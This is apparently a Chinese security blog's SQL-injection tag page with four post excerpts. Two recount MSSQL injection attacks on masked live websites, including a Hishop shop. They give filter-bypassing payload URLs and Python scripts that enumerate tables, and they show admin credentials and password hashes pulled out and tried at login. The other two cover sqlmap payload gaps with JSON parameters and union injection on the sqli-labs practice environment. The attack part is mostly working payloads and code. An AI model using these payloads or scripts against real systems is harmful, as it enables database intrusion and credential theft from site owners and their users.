Tag:SQL注入

Tag (SQL注入)'s result:

又又一次mssql注入

记一次mssql注入历程 又一次mssql注入历程   0x00 爆数据库 过滤了单引号,空格等 利用char,0x绕过,注意%2b编码 http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,((select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=5)))–     0x01 爆表名 http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in(char(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111))))– 写个脚本跑表 #coding:utf-8 #Author:LSA import sys import requests from bs4 import BeautifulSoup import re headers = { ‘Cookie’: ”, ‘User-Agent’: ‘Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36’ } global tables_name tables_name = “char(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)%2bchar(111)” #print tables_name def deal_table_name(table_name): xx = ” xxxx = ” for i in range(0,len(table_name)): xx = xx + str(ord(table_name[i])) + ‘ ‘ print xx xxx = xx[:-1].split(‘ ‘) print xxx for i in range(0,len(xxx)): xxxx = xxxx + ‘char(‘ + xxx[i] + ‘)’ + ‘%2b’ return xxxx[:-3] def brute_tables(url): for i in range(0,300): url = ‘http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in(‘ + tables_name + ‘)))–‘ print url rsp = requests.get(url,headers=headers) soup = BeautifulSoup(rsp.text,”lxml”) title = soup.title.string #print title table_name = re.findall(r”‘(.*?)'”,title) print table_name[0] table_name = deal_table_name(table_name[0]) print table_name global tables_name tables_name = tables_name + ‘,’ + table_name #print tables_name print tables_name def main(url): brute_tables(url) if __name__ == ‘__main__’: url = ‘http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/name/**/from/**/jy..sysobjects/**/where/**/xtype=0x75/**/and/**/name/**/not/**/in(‘ + tables_name + ‘)))–‘ main(url) 0x02 爆列名 http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/COLUMN_NAME/**/from/**/jy.information_schema.columns/**/where/**/TABLE_NAME=char(85)%2bchar(115)%2bchar(101)%2bchar(114)%2bchar(115)/**/and/**/COLUMN_NAME/**/not/**/in(char(73)%2bchar(100))))–   0x03 爆数据 http://www.xxx.cn/xxxInfo.aspx?Id=-111/**/and/**/1=convert(int,(select/**/top/**/1/**/username/**/from/**/Users))–   0x04……

记一次mssql注入历程

0x00 发现 目标使用hishop,查看历史漏洞发现一处注入: http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271   db_name():xxxshop017 user:xxxx017 @@servername:XXXSHOP   0x01 郁闷的爆表名 那就开始爆xxxshop017的表吧 http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(%27Hishop_HelpCategories%27))%3E0%20and%20%271%27=%271 /× 也可以利用information_schema爆表 http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20table_name%20from%20information_schema.tables%20);– ×/ 写个脚本跑表 #coding:utf-8 #Author:LSA #Description:hishop sqli for /user/UserRefundApply?OrderId= #Date:20190701 import sys import requests from bs4 import BeautifulSoup import re headers = { ‘Cookie’: ”, ‘User-Agent’: ‘Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36’ } global tables_name tables_name = “‘Hishop_HelpCategories'” #print tables_name def brute_tables(url): for i in range(0,300): url = ‘http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(‘ + tables_name + ‘))%3E0%20and%20%271%27=%271’ print url rsp = requests.get(url,headers=headers) soup = BeautifulSoup(rsp.text,”lxml”) title = soup.title.string #print title table_name = re.findall(r”‘(.*?)'”,title) #print table_name[0] global tables_name tables_name = tables_name + ‘,\” + table_name[0] + ‘\” #print tables_name print tables_name def main(url): brute_tables(url) if __name__ == ‘__main__’: url = ‘http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(‘ + tables_name + ‘))%3E0%20and%20%271%27=%271’ main(url) 郁闷开始了,竟然报错了! 经测试,是因为url长度超过2093返回404了,利用burp和chrome都是相同情况,目标系统iis8.5+.net4,在使用相同hishop的另外一个网站(iis7.5)测试不会404…… 猜测可能是运维修改了IIS最大url长度,但是可能性非常低! 无奈,利用xml path爆吧 利用xml path()爆所有表 http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20xxxshop017..sysobjects%20where%20xtype=%27U%27%20FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271   由于表名太多,最后出现省略号,无法爆完所有表。   那就利用not in分两次爆,把第一次用xml path爆出来的表名加入not in。 http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=CONVERT(INT,(select%20quotename(name)%20from%20xxxshop017..sysobjects%20where%20xtype=%27U%27%20and%20name%20not%20in%20(%27Hishop_HelpCategories%27,%27Hishop_Hotkeywords%27,%27Hishop_OrderDailyStatistics%27,%27Hishop_CountDownSku%27,%27Hishop_Helps%27,%27Hishop_NavMenu%27,%27Hishop_Gifts%27,%27Hishop_ProductConsultations%27,%27Hishop_MessageTemplates%27,%27CustomMade_Logs%27,%27Hishop_FriendlyLinks%27,%27Hishop_ProductAttributes%27,%27Hishop_MessageContent%27,%27Hishop_FightGroupActivities%27,%27Hishop_PointDetails%27,%27Hishop_MemberMessageBox%27,%27Hishop_FavoriteTags%27,%27Hishop_InpourRequest%27,%27Hishop_ExpressTemplates%27,%27Hishop_ManagerMessageBox%27,%27Hishop_SKUMemberPrice%27,%27Hishop_EmailQueue%27,%27Hishop_SKUItems%27,%27Hishop_DeliveryScope%27,%27Hishop_MenuClickRecords%27,%27Hishop_UserShippingAddresses%27,%27Hishop_DailyAccessStatistics%27,%27Hishop_Logs%27,%27Hishop_ShoppingCarts%27,%27Hishop_Coupons%27,%27Hishop_IntegrationSettings%27,%27Hishop_ProductPreSale%27,%27Hishop_GiftShoppingCarts%27,%27Hishop_PhotoGallery%27,%27Hishop_PromotionRegions%27,%27Hishop_ProductDailyAccessStatistics%27,%27Hishop_Favorite%27,%27Hishop_PhotoCategories%27,%27Hishop_MarketingImages%27,%27Hishop_PhoneCodeIPs%27,%27Hishop_PhoneCodeEveryDayTimes%27,%27Hishop_PrivilegeInRoles%27,%27aspnet_Referrals%27,%27Hishop_PaymentTypes%27,%27Hishop_ProductSpecificationImages%27,%27aspnet_MemberOpenIds%27,%27Hishop_Orders%27,%27Hishop_Products%27,%27Hishop_BalanceDrawRequest%27,%27aspnet_Roles%27,%27Hishop_Shippers%27,%27Hishop_BalanceDetails%27,%27ChangeStockLog%27,%27Hishop_Service%27,%27aspnet_MemberGrades%27,%27Hishop_RelatedProducts%27,%27aspnet_OpenIdSettings%27,%27Custom_Etickets%27,%27Hishop_RelatedArticsProducts%27,%27aspnet_MemberWXShoppingGuider%27,%27Hishop_Regions%27,%27aspnet_MemberWXReferral%27,%27Custom_EticketsResult%27,%27Hishop_RedEnvelopeSendRecord%27,%27aspnet_MemberTags%27,%27Hishop_RedEnvelopeGetRecord%27,%27Hishop_CombinationBuySKU%27)FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271       0x02 获取列名和数据 判断管理员帐号密码可能在 aspnet_Members或aspnet_Managers这两个表中 先看aspnet_Members http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20xxxshop017..aspnet_Members%20FOR%20XML%20PATH(%27%27))–   得到帐号admin密码xxx2018@ 利用where、not in可以获取多个数据 有些帐号的密码经过了加密(疑似RSA) <Password>dNPQ/7vfChaeOmCL7Wb8mRmRq9U=</Password><PasswordSalt>5pk/VC1CM8ARImoqpquGpg==</PasswordSalt> 再看看aspnet_Managers http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20xxxshop017..aspnet_Managers%20FOR%20XML%20PATH(%27%27))–   密码base16/32/64无法解密 疑似经过了rsa加密。   利用admin xxx2018@登录失败。 猜测可能是数据库不对,尝试爆所有数据库。 利用xml paht()爆所有库 http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%20(select%20quotename(name)%20from%20master..sysdatabases%20FOR%20XML%20PATH(%27%27))%3E0%20and%20%271%27=%271   得到可能存在帐号密码的数据库(域名是mall) [xxxmall] 尝试跨库查询 http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20xxxmall..sysobjects%20where%20xtype=%27U%27%20FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271……

关于sqlmap的两个小坑

0x00 概述 近日在利用sqlmap注入测试时遇到一个奇怪的现象,高版本sqlmap无法检测出注入,但是低版本的可以测出注入,并且能跑出数据不是误报,经过对比测试和查看sqlmap源码,发现两个小坑。   0x01 情景重现 注入点形式:json ……”whereparams”:[{“name”:”keyWord”,”value”:”test”}]} 可注入参数:value sqlmap命令: python sqlmap.py -r sqlpk.txt –flush-session -vv sqlmap v1.2.11无法注入 sqlmap v1.2成功注入 同理v1.2.10无法注入,v1.1.12可以注入 经过分析,两坑如下: (1)v1.2.11(/v1.2.10/v1.2.9/master)的boundaries.xml没有了针对模糊查询(%)的测试,而v1.2(/v1.1.12/1.1.4/1.2.2)则有。 (2)v1.2.11(/v1.2.10/1.2.9/master)必须手动设置json的某个参数为*才能对这个参数进行注入,否则payload直接跟在json后导致无法注入,而v1.2(/v1.1.12)则可以默认回车(y)即可对json的某个参数注入。   0x02 详细测试 坑点(1): 先了解sqlmap的payload组成: //图片来源https://www.freebuf.com/column/161797.html 看看v1.2的测试payload: 使用了payload:%‘ and 5731=5731 and ‘%’=’ 这是挺常见的搜索框注入 看看V1.2的boundaries.xml: 而v1.2.11的boundaries.xml没有对模糊查询的注入测试! https://github.com/sqlmapproject/sqlmap/blob/master/xml/boundaries.xml 于是添加模糊查询的注入测试到v1.2.11的该文件中,并手动添加*到注入参数(如value),即可成功注入! 附上添加后的版本: https://github.com/theLSA/sqlmap/tree/dev pr得到答复是因为误报太多所以移除了相关payload,但是会有限的恢复。 https://github.com/sqlmapproject/sqlmap/pull/3372   坑点(2): 对比v1.2和v1.2.11的payload: 可以看出直接将payload接在json末尾了。 在注入参数value手动添加* %22whereparams%22%3A%5B%7B%22name%22%3A%22keyWord%22%2C%22value%22%3A%22*%22%7D%5D%7D 即可成功注入!   0x03 结语 1. 个人建议添加模糊查询的测试payload,误报还是好过漏报,况且是很常见的模糊查询注入。 2. 遇到json参数尽量加手动*(针对某些版本的sqlmap)。 3. 利用sqlmap测试的时候建议加上-vv。    

浅谈union注入

0x00 概述 union注入是一种简单有效的注入方式,以前只是套公式或者sqlmap刷,此文简述其原理(侧重点在union select)。   0x01 union注入 环境:sqli-labs 1. 判断列数 order by / group by union select 要求两个表查询的字段数必须相同,否则报错(列名以第一个select为准) 2. 使原数据查询为空 如id=2改为id=-2或id=2000000查询不存在的数据则为空,就可以显示要查询的敏感数据(防止正常数据干扰) 3. 使用1,2,3,4,5占位 如union select 1,2,3,4,5判断出可以显示的位置(显示位),如果要求字段类型也要相同,则使用null代替数字。 4. 将数字替换成敏感数据 如union select 1,2,user(),database(),5   0x02 sqli-labs lesson 1 字符型注入 1. 判断列数 3对4错,列数3 Id=1‘ group by 3– – 2. 使原数据查询为空&&数字占位 Id=-1’ union select 1,2,3– – 显示位2 3 3. 替换显示位为敏感数据 id=-1′ union select 1,user(),database()– –   0x03 结语 union注入方便高效。